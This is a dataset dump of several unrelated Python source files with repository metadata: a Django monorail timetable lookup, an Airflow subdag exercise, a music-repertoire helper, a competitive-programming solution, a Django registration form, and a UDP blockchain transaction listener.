MYSORE_N = ['0637', '0659', '0721', '0743', '0805', '0827', '0849', '0911', '0933', '0955', '1017', '1039', '1101', '1123', '1145', '1207', '1229', '1251', '1313', '1335', '1357', '1419', '1441', '1503', '1525', '1547', '1609', '1631', '1653', '1715', '1737', '1759', '1821', '1843', '1905', '1927', '1949', '2011', '2033', '2055', '2117', '2139', '2201', '2223', '2245']
BHARAT_N = ['0634', '0656', '0718', '0740', '0802', '0824', '0846', '0908', '0930', '0952', '1014', '1036', '1058', '1120', '1142', '1204', '1226', '1248', '1310', '1332', '1354', '1416', '1438', '1500', '1522', '1544', '1606', '1628', '1650', '1712', '1734', '1756', '1818', '1840', '1902', '1924', '1946', '2008', '2030', '2052', '2114', '2136', '2158', '2220', '2242']
WADALA_N = ['0627', '0649', '0711', '0733', '0755', '0817', '0839', '0901', '0923', '0945', '1007', '1029', '1051', '1113', '1135', '1157', '1219', '1241', '1303', '1325', '1347', '1409', '1431', '1453', '1515', '1537', '1559', '1621', '1643', '1705', '1727', '1749', '1811', '1833', '1855', '1917', '1939', '2001', '2023', '2045', '2107', '2129', '2151', '2213', '2235']
ANTOP_N = ['0620', '0642', '0704', '0726', '0748', '0810', '0832', '0854', '0916', '0938', '1000', '1022', '1044', '1106', '1128', '1150', '1212', '1234', '1256', '1318', '1340', '1402', '1424', '1446', '1508', '1530', '1552', '1614', '1636', '1658', '1720', '1742', '1804', '1826', '1848', '1910', '1932', '1954', '2016', '2038', '2100', '2122', '2144', '2206', '2228']
GTB_N = ['0623', '0645', '0707', '0729', '0751', '0813', '0835', '0857', '0919', '0941', '1003', '1025', '1047', '1109', '1131', '1153', '1215', '1237', '1259', '1321', '1343', '1405', '1427', '1449', '1511', '1533', '1555', '1617', '1639', '1701', '1723', '1745', '1807', '1829', '1851', '1913', '1935', '1957', '2019', '2041', '2103', '2125', '2147', '2209', '2231']
WADALAB_N = ['0615', '0637', '0659', '0721', '0743', '0805', '0827', '0849', '0911', '0933', '0955', '1017', '1039', '1101', '1123', '1145', '1207', '1229', '1251', '1313', '1335', '1357', '1419', '1441', '1503', '1525', '1547', '1609', '1631', '1653', '1715', '1737', '1759', '1821', '1843', '1905', '1927', '1949', '2011', '2033', '2055', '2117', '2139', '2201', '2223']
AMBEDKAR_N= ['0606', '0628', '0650', '0712', '0734', '0756', '0818', '0840', '0902', '0924', '0946', '1008', '1030', '1052', '1114', '1136', '1158', '1220', '1242', '1304', '1326', '1348', '1410', '1432', '1454', '1516', '1538', '1600', '1622', '1644', '1706', '1728', '1750', '1812', '1834', '1856', '1918', '1940', '2002', '2024', '2046', '2108', '2130', '2152', '2214']
ACHARYA_N = ['0616', '0638', '0700', '0722', '0744', '0806', '0828', '0850', '0912', '0934', '0956', '1018', '1040', '1102', '1124', '1146', '1208', '1230', '1252', '1314', '1336', '1358', '1420', '1442', '1504', '1526', '1548', '1610', '1632', '1654', '1716', '1738', '1800', '1822', '1844', '1906', '1928', '1950', '2012', '2034', '2056', '2118', '2140', '2202', '2224']
DADAR_N = ['0613', '0635', '0657', '0719', '0741', '0803', '0825', '0847', '0909', '0931', '0953', '1015', '1037', '1059', '1121', '1143', '1205', '1227', '1249', '1311', '1333', '1355', '1417', '1439', '1501', '1523', '1545', '1607', '1629', '1651', '1713', '1735', '1757', '1819', '1841', '1903', '1925', '1947', '2009', '2031', '2053', '2115', '2137', '2159', '2221']
NAIGAON_N =['0612', '0634', '0656', '0718', '0740', '0802', '0824', '0846', '0908', '0930', '0952', '1014', '1036', '1058', '1120', '1142', '1204', '1226', '1248', '1310', '1332', '1354', '1416', '1438', '1500', '1522', '1544', '1606', '1628', '1650', '1712', '1734', '1756', '1818', '1840', '1902', '1924', '1946', '2008', '2030', '2052', '2114', '2136', '2158', '2220']
MINT_N = ['0605', '0627', '0649', '0711', '0733', '0755', '0817', '0839', '0901', '0923', '0945', '1007', '1029', '1051', '1113', '1135', '1157', '1219', '1241', '1303', '1325', '1347', '1409', '1431', '1453', '1515', '1537', '1559', '1621', '1643', '1705', '1727', '1749', '1811', '1833', '1855', '1917', '1939', '2001', '2023', '2045', '2107', '2129', '2151', '2213']
LOWER_N = ['0604', '0626', '0648', '0710', '0732', '0754', '0816', '0838', '0900', '0922', '0944', '1006', '1028', '1050', '1112', '1134', '1156', '1218', '1240', '1302', '1324', '1346', '1408', '1430', '1452', '1514', '1536', '1558', '1620', '1642', '1704', '1726', '1748', '1810', '1832', '1854', '1916', '1938', '2000', '2022', '2044', '2106', '2128', '2150', '2212']
SANT_N = ['0600', '0622', '0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208']
# Create your views here.
def main(request):
return render(request,'index.html')
def recent(request):
db = search.objects.all()
return render(request,'recent.html',{'search_a':db})
def delete(request):
search.objects.all().delete()
db = search.objects.all()
return render(request,'recent.html',{'search_a':db})
def choice(request):
arrival = request.GET['Arrival']
depart = request.GET['Deparutre']
station = ['CHEMBUR','VNP MARG','FERTILIZER TOWNSHIP','BHARAT PETROLEUM','MYSORE COLONY','BHAKTI PARK','WADALA','GTB NAGAR','ANTOP HILL','ACHARYA ATRE NAGAR','WADALA BRIDGE','DADAR EAST','NAIGAON','AMBEDKAR COLONY','MINT COLONY','LOWER PAREL',"SANT GADGE CHOWK"]
req_time = request.GET['time']
a = None
req_time = req_time.replace(':', '')
direction = None
info = arrival + " TO " + depart + " at " + req_time[0:2] + ":" + req_time[2:4]
db = search.objects.all()
a = search(searches = info).save()
for element in station:
if element == arrival:
direction = 'North'
break
elif element == depart:
direction = 'South'
break
else:
continue
print(arrival,direction,a)
if direction == 'North' and arrival == 'CHEMBUR':
for time in CHEM_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'VNP MARG':
for time in VNP_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'FERTILIZER TOWNSHIP':
for time in FER_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'BHARAT PETROLEUM':
for time in BHARAT_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'MYSORE COLONY':
for time in MYSORE_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'BHAKTI PARK':
for time in BHAKTI_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'WADALA':
for time in WADALA_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'GTB NAGAR' :
for time in GTB_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'ANTOP HILL':
for time in ANTOP_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'ACHARYA ATRE NAGAR':
for time in ACHARYA_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'WADALA BRIDGE':
for time in WADALAB_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'DADAR EAST':
for time in DADAR_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'NAIGAON':
for time in NAIGAON_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'AMBEDKAR NAGAR':
for time in AMBEDKAR_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'MINT COLONY':
for time in MINT_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'LOWER PAREL':
for time in LOWER_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'SANT GADGE':
for time in SANT_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'CHEMBUR':
for time in CHEM_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'VNP MARG':
for time in VNP_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'FERTILIZER TOWNSHIP':
for time in FER_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'BHARAT PETROLEUM':
for time in BHARAT_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'MYSORE COLONY':
for time in MYSORE_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'BHAKTI PARK':
for time in BHAKTI_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'WADALA':
for time in WADALA_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'GTB NAGAR' :
for time in GTB_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'ANTOP HILL':
for time in ANTOP_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'ACHARYA ATRE NAGAR':
for time in ACHARYA_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'WADALA BRIDGE':
for time in WADALAB_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'DADAR EAST':
for time in DADAR_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'NAIGAON':
for time in NAIGAON_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'AMBEDKAR NAGAR':
for time in AMBEDKAR_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'MINT COLONY':
for time in MINT_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'LOWER PAREL':
for time in LOWER_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'SANT GADGE':
for time in SANT_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
position = ['FROM : ' + str(arrival),'TO : '+ str(depart)]
final_time = [a[0:1],a[1:2],':',a[2:3],a[3:4]]
return render(request,'result.html',{'time':final_time,'position':position})
| [
"akashrockzz411@gmail.com"
] | akashrockzz411@gmail.com |
51b0ecc3f68e0a7f94297a54e5a5c33b9f699b5b | 658e2e3cb8a4d5343a125f7deed19c9ebf06fa68 | /course_DE/udacity-data-engineering-projects-master/Project 5 - Data Pipelines with Airflow/exercises/dags/3_ex3_subdags/subdag.py | 2751def0ecb6a5a10629e528018801bbdaf2210a | [] | no_license | yennanliu/analysis | 3f0018809cdc2403f4fbfe4b245df1ad73fa08a5 | 643ad3fed41961cddd006fadceb0e927f1db1f23 | refs/heads/master | 2021-01-23T21:48:58.572269 | 2020-10-13T22:47:12 | 2020-10-13T22:47:12 | 57,648,676 | 11 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | # Instructions
# In this exercise, we’ll place our S3 to RedShift Copy operations into a SubDag.
# 1 - Consolidate HasRowsOperator into the SubDag
# 2 - Reorder the tasks to take advantage of the SubDag Operators
import datetime
from airflow import DAG
from airflow.operators.postgres_operator import PostgresOperator
from airflow.operators.udacity_plugin import HasRowsOperator
from airflow.operators.udacity_plugin import S3ToRedshiftOperator
import sql_statements.py
# Returns a DAG which creates a table if it does not exist, and then proceeds
# to load data into that table from S3. When the load is complete, a data
# quality check is performed to assert that at least one row of data is
# present.
def get_s3_to_redshift_dag(
parent_dag_name,
task_id,
redshift_conn_id,
aws_credentials_id,
table,
create_sql_stmt,
s3_bucket,
s3_key,
*args, **kwargs):
dag = DAG(
f"{parent_dag_name}.{task_id}",
**kwargs
)
create_task = PostgresOperator(
task_id=f"create_{table}_table",
dag=dag,
postgres_conn_id=redshift_conn_id,
sql=create_sql_stmt
)
copy_task = S3ToRedshiftOperator(
task_id=f"load_{table}_from_s3_to_redshift",
dag=dag,
table=table,
redshift_conn_id=redshift_conn_id,
aws_credentials_id=aws_credentials_id,
s3_bucket=s3_bucket,
s3_key=s3_key
)
#
# TODO: Move the HasRowsOperator task here from the DAG
#
create_task >> copy_task
#
# TODO: Use DAG ordering to place the check task
#
return dag
| [
"f339339@gmail.com"
] | f339339@gmail.com |
ca9a92d1612494dd95fd85bed22d1c0fab8da6d2 | 1c9aa8f755f0a4beb60db8e006a36d56ab8d8d68 | /src/common.py | cb5930b381480ac553db62c28919722b1349cf92 | [] | no_license | silverfield/repertoire-mng | 1e7b457014b75b66d42a8008570f0582eb395da1 | a99c9937269f07773458aa312fc18ba34f165e31 | refs/heads/master | 2021-01-01T08:05:01.118859 | 2020-11-22T20:54:10 | 2020-11-22T20:54:10 | 239,187,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,997 | py | import os
import json
cur_dir = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = f'{cur_dir}/../data'
OUTPUT_DIR = f'{cur_dir}/../output'
TYPE_BT = 'bt'
TYPE_NBT = 'nbt'
ON_LINUX = os.path.exists('/opt')
PREFIX = '/d'
if not ON_LINUX:
PREFIX = 'G:'
PDF_DIRS = [f'{PREFIX}/music/akordy/chords', f'{PREFIX}/music/akordy/fero-hajnovic']
REPE_FOLDER = f'{PREFIX}/music/repertoire'
WEBSITE_DATA_DIR = '/home/fero/wspace/fhweb/src/data'
if not ON_LINUX:
WEBSITE_DATA_DIR = 'G:/wspace/fhweb/fhweb/src/data'
def mkdir(d):
if not os.path.exists(d):
os.makedirs(d)
mkdir(DATA_DIR)
mkdir(OUTPUT_DIR)
COMMON_ABBRS = {
'FH': 'Fero Hajnovic',
'DS': 'Dire Straits',
'MK': 'Mark Knopfler',
'EC': 'Eric Clapton',
'PF': 'Pink Floyd',
}
def get_artist(item, expand_abbrs=False):
artist = item.split(' - ')[0]
if expand_abbrs:
if artist in COMMON_ABBRS:
artist = COMMON_ABBRS[artist]
return artist
def get_name(item):
return item.split(' - ')[1]
def get_full_name(item, expand_artist_abbrs=False):
return f'{get_artist(item, expand_artist_abbrs)} - {get_name(item)}'
def is_bt(item):
return item.split(' - ')[-1] == 'BT'
with open(f'{DATA_DIR}/song-props.json', 'r') as f:
PROPS = json.loads(f.read())
if any(len(i['tags']) == 0 for i in PROPS):
no_tags_props = [i['name'] for i in PROPS if len(i['tags']) == 0]
raise ValueError(f'Tags not specified for {no_tags_props}')
PROPS = {i['name'].lower(): i for i in PROPS}
# print(PROPS)
def get_song_props(item):
key = get_full_name(item, expand_artist_abbrs=True).lower()
if key in PROPS:
return PROPS[key]
err_msg = f'{item} not found in props'
print(err_msg)
print('Maybe add something like this to song-props.json:')
print(json.dumps({
"name": item,
"tags": [],
"used": True,
"versions": ['nbt'],
"loop": None
}, indent=4))
raise KeyError(err_msg) | [
"ferohajnovic@gmail.com"
] | ferohajnovic@gmail.com |
4998d14e229e37f835bbecc90cd2f99ce4d68860 | 78efa54b2b253f99ea7e073f783e6121c20cdb52 | /Codechef/Maximize The Sum.py | 6c263f96896aaeb642979ffca927fdf582635a67 | [] | no_license | NishchaySharma/Competitve-Programming | 32a93581ab17f05d20129471f7450f34ec68cc53 | 1ec44324d64c116098eb0beb74baac7f1c3395bb | refs/heads/master | 2020-04-08T04:02:46.599398 | 2020-01-01T15:51:39 | 2020-01-01T15:51:39 | 159,000,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | for _ in range(int(input())):
n=int(input())
arr=sorted(list(map(int,input().split())))
res=0
for i in range(n//2):
res+=abs(arr[i]-arr[n-i-1])
print(res)
| [
"noreply@github.com"
] | noreply@github.com |
5b50487270c74172bed04c7f6257121b2eacd2c0 | be937643b2d7a8ae86b87bfb286c2119fe8423c3 | /authentication/forms.py | 4b91e273758d346b7714f21fcd824fa56037c5c9 | [] | no_license | Detharion91/django-tickets-app | 58f8a4151bea424517a4e2c102e09e6bc5e9c38d | cfbcf19b373aa6412a2904a7386d82a8e0139744 | refs/heads/master | 2020-03-30T13:24:18.603969 | 2018-10-02T14:54:59 | 2018-10-02T14:54:59 | 151,271,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,167 | py | from django import forms
from django.utils.translation import gettext_lazy as _
from django.contrib.auth.models import User
class RegisterForm(forms.ModelForm):
password = forms.CharField(label=_('Password'), widget=forms.PasswordInput)
password2 = forms.CharField(label=_('Confirm Password'), widget=forms.PasswordInput)
class Meta:
model = User
fields = ('username', 'email',)
def clean_password2(self):
password = self.cleaned_data.get('password')
password2 = self.cleaned_data.get('password2')
if password2 != password:
raise forms.ValidationError(_('Password does not match'))
return password2
def clean_username(self):
username = self.cleaned_data.get('username')
user = User.objects.filter(username=username)
if user:
raise forms.ValidationError(_('Username already exists'))
return username
def save(self, commit=True):
user = super(RegisterForm, self).save(commit=False)
user.set_password(self.cleaned_data.get('password'))
if commit:
user.save()
return user | [
"ghernandezdelrosario@gmail.com"
] | ghernandezdelrosario@gmail.com |
ca962831629656a8d9a0b99cd1a750b6fb3b06eb | 24a7c711c15c70fc2961ce9bdbada50ac0aafa01 | /src/blockchain/miner/services/transaction_listener.py | cb927614faee5331135afdf80a4c4a9f4fa58e09 | [] | no_license | thaolt/blockchain | bad75f4eea2d2886e23e69429bc0dedf99fe1b0e | 582ecb10c0ecb97583c8d814242fca5ef1100b23 | refs/heads/master | 2020-04-02T22:10:37.233766 | 2018-04-01T09:33:46 | 2018-04-01T09:33:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,667 | py | from socket import *
from threading import Thread
import logging
import sys
from blockchain.common.utils import bytes_to_text
from blockchain.common.encoders import transaction_decode
SERVICE_NAME = 'Transaction Listener'
BUFFER_SIZE = 1024 * 1024
BACKLOG_SIZE = 3
class TransactionListener(Thread):
def __init__(self, listener_port, shutdown_event, on_new_transaction):
Thread.__init__(self)
self.listener_port = listener_port
self.shutdown_event = shutdown_event
self.on_new_transaction = on_new_transaction
def run(self):
self.socket = socket(AF_INET, SOCK_DGRAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
self.socket.bind(('', self.listener_port))
logging.info('{} listening for new transactions on port {}...'.format(SERVICE_NAME, self.listener_port))
while not self.shutdown_event.is_set():
try:
bytes, addr = self.socket.recvfrom(BUFFER_SIZE)
transaction_text = bytes_to_text(bytes)
transaction = transaction_decode(transaction_text)
logging.info('{} received new transaction for amount {} from {}'.format(SERVICE_NAME, transaction.amount, addr[0]))
self.on_new_transaction(transaction)
except OSError:
logging.debug('{} error: {}'.format(SERVICE_NAME, sys.exc_info()))
pass # probably close() was called
except Exception:
logging.error('{} error: {}'.format(SERVICE_NAME, sys.exc_info()))
logging.info('{} shut down'.format(SERVICE_NAME))
def close(self):
self.socket.close()
| [
"rob@codebox.org.uk"
] | rob@codebox.org.uk |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.